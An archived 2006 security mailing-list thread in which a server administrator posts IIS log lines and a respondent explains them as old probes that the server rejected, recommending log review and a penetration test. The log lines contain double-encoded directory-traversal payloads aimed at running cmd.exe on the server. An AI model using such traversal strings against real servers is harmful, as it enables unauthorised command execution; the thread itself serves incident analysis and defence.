headers
nemanja.janic | 12 Dec 2006 16:01
Picon

IIS http error log entries...

Hello list,
i hope i got the right group, 
i just found these in my IIS logs:

-----------------------

2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD
/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - - Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD
(Continue reading)

Permalink | Reply |
headers
Wayne S. Anderson | 13 Dec 2006 06:17

RE: IIS http error log entries...

As most of the people have responded thus far, this is not a cause for
concern directly based on these log entries.

Essentially what is happening here is that an external user is using a
series of character strings against relatively old attack vectors that
offered methods of executing commands against the native shell in windows in
long-past versions of IIS.  From what we are seeing here, these are old
executions trying to exploit weaknesses in frontpage extensions, RPC-based
application pools, as well as the msadc folder in IIS 5.0.  Most of these
vulnerabilities have been removed over the last several years and the newest
attack vector out of those probed below is 3 or so years old (think IIS 5
timeframe).  

Speaking specifically to this log snippet, it looks like these were all
error-handled correctly and I would advise scanning your access logs as well
for any other access attempts from this source IP.

As one of the earlier posters to this thread advised, taking the time to
assess your IT policy would be a good idea, particularly when it comes to
considering policies on log auditing and possibly using some budget to hire
or internally execute a penetration test against your servers.
--------------------------------------
Wayne S. Anderson
"An sufficiently developed bug is indistinguisable from a feature."
http://www.linkedin.com/in/wayneanderson 

-----Original Message-----
From: listbounce <at> securityfocus.com [mailto:listbounce <at> securityfocus.com] On
Behalf Of nemanja.janic <at> centroproizvod.co.yu
Sent: Tuesday, December 12, 2006 8:02 AM
(Continue reading)

Permalink | Reply |

Gmane